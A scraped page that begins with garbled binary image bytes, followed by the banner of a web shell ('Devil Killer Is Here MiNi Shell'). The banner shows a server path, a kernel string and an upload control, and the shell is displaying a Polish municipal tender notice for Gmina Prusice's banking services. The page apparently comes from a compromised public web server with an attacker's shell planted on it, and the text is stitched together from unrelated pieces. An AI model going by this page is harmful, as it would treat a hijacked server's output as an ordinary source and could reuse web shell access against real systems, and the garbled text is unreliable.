JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210419/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210419/0003556704-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00035567 z dnia 2021-04-19</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowa obsługa bankowa budżetu Gminy Prusice oraz jednostek organizacyjnych w latach 2021-2024 oraz zaciągnięcie przez Gminę Prusice kredytu krótkoterminowego w rachunku bieżącym (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Prusice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935106</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prusice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 312 62 24 wew.36</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">71 312 62 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">k.szachniewicz@prusice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.prusice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa w Piotrkowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">001180872</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piotrkowice</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrkowice 19</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 312 65 42</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariatpiotrkowice@gmail.com</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://magicznepiotrkowice.szkolnastrona.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">3</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa w Skokowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">001180889</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skokowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 312 65 13</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">skokowasp@gmail.com</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://spskokowa.szkolnastrona.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">4</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Ośrodek Pomocy Społecznej w Prusicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">005941954</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prusice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 312 51 97</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mgopsprusice@poczta.onet.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://opsprusice.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">5</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Ośrodek Kultury i Sportu w Prusicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">930829448</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prusice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 312 63 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gokis@prusice.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://gokis.prusice.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">6</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Miejski w Prusicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">00539302</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prusice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 312 62 24</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">71 312 62 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">prusice@prusice.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://prusice.pl/22/strona-glowna.html</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">7</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa im. Henryka Sienkiewicza w Prusicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">000586566</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żmigrodzka 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prusice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spprusice.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://spprusice.edupage.org/</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">Zamawiającym odpowiedzialnym za przeprowadzenie postepowania jest Gmina Prusice, zamówienie będzie udzielone przez gminę Prusice w imieniu i na rzecz Zamawiających.</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa obsługa bankowa budżetu Gminy Prusice oraz jednostek organizacyjnych w latach 2021-2024 oraz zaciągnięcie przez Gminę Prusice kredytu krótkoterminowego w rachunku bieżącym (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b65c13f1-9c4b-11eb-b7a8-ba075a5bf367</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00035567</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">04</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://prusice.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://prusice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://prusice.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.2)	Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3)	Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej.4)	Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. 5)	Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.6)	Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.7)	Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. W celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy "Pytanie wysłane". 8)	Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem Platformy Zakupowej.9)	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego tel. +48 22 257 22 24 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://prusice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 1)	administratorem Pani/Pana danych osobowych jest Zamawiający, o którym mowa w pkt I SWZ oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina Prusice prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://prusice.ezamawiajacy.pl;2)	inspektorem ochrony danych osobowych w Gminie Prusice jest Pani/Pani Iwona Miszczuk, e-mail i.miszczuk@prusice.pl, tel. 71 312 62 24 wew. 44, Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. ,,Kompleksowa obsługa bankowa budżetu Gminy Prusice oraz jej jednostek organizacyjnych w latach 2021-2024 oraz zaciągnięcie przez Gminę Prusice kredytu krótkoterminowego w rachunku bieżących w kwocie 300 000zł, na pokrycie występującego w ciągu roku przejściowego deficytu na latach 2021-2024 „ Sygn. ZP.271.1.3.2021;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18, 19 oraz art. 74-76 ustawy pzp; 4)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;5)obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 6)w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;7)	posiada Pani/Pan:−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; −	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;8)	nie przysługuje Pani/Panu:−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit.c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 135123,35 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowa obsługa bankowa budżetu Gminy Prusice oraz jej jednostek organizacyjnych w latach 2021-2024 oraz zaciągnięcie przez Gminę Prusice kredytu krótkoterminowego w rachunku bieżącym w kwocie 3 000 000 zł, na pokrycie występującego w ciągu roku przejściowego deficytu w latach 2021-2024.1.Otwieranie, zamykanie i prowadzenie podstawowego rachunku bieżącego, rachunków pomocniczych oraz rachunków funduszy celowych, depozytowych oraz innych rachunków wynikających z przepisów prawa dla niżej wymienionych jednostek organizacyjnych w formie elektronicznej: •	Urzędu Miejskiego w Prusicach•Szkoła Podstawowa w Piotrkowicach•Szkoła Podstawowa w Skokowej•Szkoła Podstawowa im. Henryka Sienkiewicza w Prusicach•Gminny Ośrodek Pomocy Społecznej w Prusicach •Gminna Biblioteka Publiczna w Prusicach•Gminny Ośrodek Kultury i Sportu w Prusicach2.Otwieranie nowych rachunków w zależności od potrzeb zamawiającego (Zamawiający zastrzega, że liczba jednostek Gminy jak również ich forma organizacyjna w okresie obowiązywania umowy może ulec zmianie. W przypadku zwiększenia liczby jednostek gminy, bądź zmiany ich formy organizacyjnej, wybrany wykonawca zawrze z tymi jednostkami umowy obsługi bankowej na warunkach wynikających z niniejszego postępowania oraz złożonej oferty.) 3.	Prowadzenie bieżącej obsługi budżetu Gminy Prusice oraz jej jednostek organizacyjnych, w tym: a)Potwierdzanie otwarcia i zamknięcia rachunków bankowych, b)Realizacja poleceń przelewów do innych banków w systemie bankowości elektronicznej lub papierowych złożonych najpóźniej do godziny 17:00 w tym samym dniu, złożonych po tej godzinie – realizacja w następnym dniu roboczym c) Przyjmowanie wpłat i dokonywanie wypłat gotówkowych - Wykonawca zapewni obsługę gotówkową Zamawiającego oraz jego jednostek organizacyjnych i kontrahentów, bez pobierania opłat i prowizji zarówno od wpłacającego jak i od Zamawiającego, w co najmniej 1 placówce bankowej znajdującej się w odległości do 15 km od Miasta Prusice, przyjmowanie wpłat i dokonywanie wypłat w placówkach bankowych na terenie Miasta Prusice odbywać się będzie co najmniej do godz. 16:00.d) Możliwość przekazywania w formie elektronicznej dyspozycji wypłaty świadczeń beneficjentom bezpośrednio do kasy banku. Wypłata świadczeń i zasiłków dla osób korzystających z pomocy społecznej w Kasie banku, Gminny Ośrodek Pomocy Społecznej w Prusicach dokonywał będzie przelewu środków przeznaczonych do wypłaty zasiłków na rachunek banku oraz przekazywał będzie listy płatnicze zawierające dane niezbędne do prawidłowej wypłaty zasiłków. Wypłata zasiłków następować powinna w kasie banku w następujących terminach: 15 dnia każdego miesiąca, od 19 do 21 dnia każdego miesiąca oraz 25 dnia każdego miesiąca , a także drugi piątek każdego miesiąca. Realizacja wypłat świadczeń z zachowaniem szczególnych zasad ochrony danych osobowych beneficjentów lub możliwość przekazywania wypłaty świadczeń beneficjentom w formie kart przedpłaconych i/lub przelewów na rachunki świadczeniobiorców. e)Wydawanie opinii i zaświadczeń bankowych, f)Miesięczna kapitalizacja odsetek od środków zgromadzonych na rachunkach bankowych, g)Przeksięgowanie skapitalizowanych odsetek od rachunków bankowych, zgodnie ze złożonymi dyspozycjami w tym zakresie, 4. Przyjmowanie środków własnych (bez uwzględnienia środków pochodzących z kredytu) z rachunków bieżących na lokaty krótkoterminowe: a) Lokowanie środków finansowych w lokaty weekendowe i lokaty (w tym również typu overnight) w dni ustawowo wolne od pracy. Środki pieniężne mają być zwrócone następnego dnia roboczego nie później niż do godz. 8:00. b)Przyjmowanie środków na lokaty odbywać się będzie bez odrębnego zlecenia, chyba że podmiot upoważniony do dysponowania 